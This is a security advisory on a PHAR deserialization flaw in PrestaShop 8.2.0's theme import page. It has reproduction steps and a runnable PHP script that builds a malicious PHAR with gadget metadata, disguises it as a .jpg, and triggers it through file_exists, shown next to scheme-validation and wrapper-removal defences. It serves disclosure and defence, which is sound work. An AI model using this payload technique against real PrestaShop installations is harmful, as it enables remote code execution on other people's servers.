PrestaShop PHAR Deserialization Vulnerability Allowing Arbitrary Code Execution

Vulnerability

A PHAR deserialization vulnerability has been identified in PrestaShop 8.2.0, in the Theme Manager's theme import feature. Attacker-controlled input from a crafted POST request reaches PHP file handling without validation of its source; when that input designates a malicious PHAR archive through the phar:// stream wrapper, PHP 7.x unserializes the archive's metadata as a side effect of the file operation. No explicit unserialize() call is needed, which is what makes this class of bug easy to miss in review. The attacker thereby instantiates objects of classes already present on the server and runs their magic methods (__wakeup, __destruct); with a suitable gadget chain this amounts to arbitrary PHP code execution.

Impact

Successful exploitation gives the attacker remote code execution in the context of the PHP process on the server hosting PrestaShop, i.e. control of the shop's code, configuration and data.

Reproduction

To reproduce, send a POST request to the themes import administration page with the malicious PHAR supplied through the 'import_theme[import_from_web]' field. The request must carry a valid admin token for that page, so the precondition is access to the back office theme import page. The target must be a PrestaShop 8.2.0 installation running PHP 7.x: from PHP 8.0 the phar:// stream wrapper no longer unserializes archive metadata during file operations (metadata is only unserialized on an explicit getMetadata() call), so the trigger does not fire there.
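To make the mechanism concrete, the following PHP script is an added example, not PrestaShop code and not taken from this advisory. It builds a PHAR whose metadata carries a serialized object of a hypothetical gadget class, triggers the deserialization with nothing more than file_exists() on a phar:// path (the generic primitive behind this class of bug), and shows the scheme check an 'import from web' handler should apply before any stream function sees the value, plus the option of removing the phar wrapper altogether. The class LogWriter, the file paths and the functions buildMaliciousPhar, importFromWebVulnerable, validateImportSource and disablePharWrapper are assumptions for the demonstration; how PrestaShop 8.2.0's handler reaches the filesystem is not detailed on this page.

```php
<?php
// Added example, not PrestaShop code. Demonstrates the generic PHAR metadata
// deserialization primitive and two defences against it. Needs PHP 7.x to show
// the trigger: from PHP 8.0 the phar:// wrapper no longer unserializes metadata
// on file operations. Run with:  php -d phar.readonly=0 phar_demo.php
declare(strict_types=1);

const ARCHIVE_PHAR = '/tmp/phar_demo.phar';  // Phar needs a .phar name to build...
const ARCHIVE_JPG  = '/tmp/phar_demo.jpg';   // ...but phar:// ignores the extension
const MARKER       = '/tmp/phar_demo_marker';

// Hypothetical gadget class. Real attacks reuse a class that already exists on
// the target's autoload path; only the class name and properties travel in the
// archive, never the class code.
class LogWriter
{
    public $path = '/tmp/phar_demo_marker';
    public $data = "phar metadata was unserialized\n";

    // __wakeup runs inside unserialize() itself, so the side effect is visible
    // at once. Gadget chains also use __destruct, which fires when the object is
    // released (for phar metadata, when the archive leaves PHP's phar cache, at
    // the latest at script end).
    public function __wakeup(): void
    {
        file_put_contents($this->path, $this->data);
    }
}

// 1. Build the archive. The serialized object lives in the PHAR metadata, not in
//    the stub or in any file entry, so scanners that only inspect entries miss it.
function buildMaliciousPhar(): string
{
    if (ini_get('phar.readonly')) {
        fwrite(STDERR, "phar.readonly is on; run with -d phar.readonly=0\n");
        exit(1);
    }
    @unlink(ARCHIVE_PHAR);
    @unlink(ARCHIVE_JPG);
    $phar = new Phar(ARCHIVE_PHAR);
    $phar->startBuffering();
    $phar->addFromString('dummy.txt', 'x');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new LogWriter());
    $phar->stopBuffering();
    unset($phar);
    // An extension allow-list on the upload is not a defence: rename to .jpg.
    rename(ARCHIVE_PHAR, ARCHIVE_JPG);
    return ARCHIVE_JPG;
}

// 2. Vulnerable pattern: any filesystem call on attacker-controlled input.
//    file_exists(), is_file(), filesize(), copy(), fopen(), getimagesize() and
//    friends all go through the stream wrapper, so a phar:// source makes
//    PHP 7.x parse the manifest and unserialize the metadata.
function importFromWebVulnerable(string $source): bool
{
    // Stand-in for a handler that "checks" the source before fetching it.
    return file_exists($source);
}

// 3. Hardened: decide by URL scheme before any stream function sees the value.
//    Only http(s) is accepted; phar://, file://, ftp://, data: etc. are rejected.
function validateImportSource(string $source): string
{
    $scheme = parse_url($source, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        throw new InvalidArgumentException('import_from_web must be an http(s) URL');
    }
    return $source;
}

// Defence in depth: if the application never needs phar:// at run time, drop the
// wrapper so no code path can reach the primitive. This is process-global.
function disablePharWrapper(): void
{
    if (in_array('phar', stream_get_wrappers(), true)) {
        stream_wrapper_unregister('phar');
    }
}

$payload = 'phar://' . buildMaliciousPhar() . '/dummy.txt';

@unlink(MARKER);
$exists = importFromWebVulnerable($payload);
printf("vulnerable handler: file_exists=%s, gadget fired=%s\n",
    var_export($exists, true), var_export(file_exists(MARKER), true));

@unlink(MARKER);
try {
    validateImportSource($payload);
} catch (InvalidArgumentException $e) {
    printf("hardened handler: rejected (%s), gadget fired=%s\n",
        $e->getMessage(), var_export(file_exists(MARKER), true));
}

disablePharWrapper();
printf("phar wrapper removed: file_exists=%s\n", var_export(@file_exists($payload), true));
```

On PHP 7.x the first line shows the marker file appearing even though the handler only asked whether a path exists; the hardened check rejects the value before any stream function touches it, and with the wrapper unregistered the phar:// path no longer resolves at all. Note that the scheme check must run on the raw submitted string: normalising, decoding or resolving the value with a filesystem function first would itself be the trigger.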

Remediation

Update to PrestaShop 8.2.2 or later, where this vulnerability has been fixed; the installed version can be confirmed, for instance, by grepping for the _PS_VERSION_ constant under the installation's config/ directory. Until the update is applied, restrict access to the back office, since the vulnerable page is an administration page. As defence in depth, shops that do not rely on phar:// at run time can unregister the phar stream wrapper, and installations on PHP 8.0 or later are not exposed to the file-operation trigger described above because metadata is no longer unserialized automatically; neither measure replaces the upgrade.

Added: Jul 30, 2025, 5:26 PM
Updated: Jul 30, 2025, 7:40 PM

Vulnerability Rating

Custom Algorithm
spread: 6.4
impact: 10.0
exploitability: 6.8
remediation: 0.0
relevance: 0.3
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.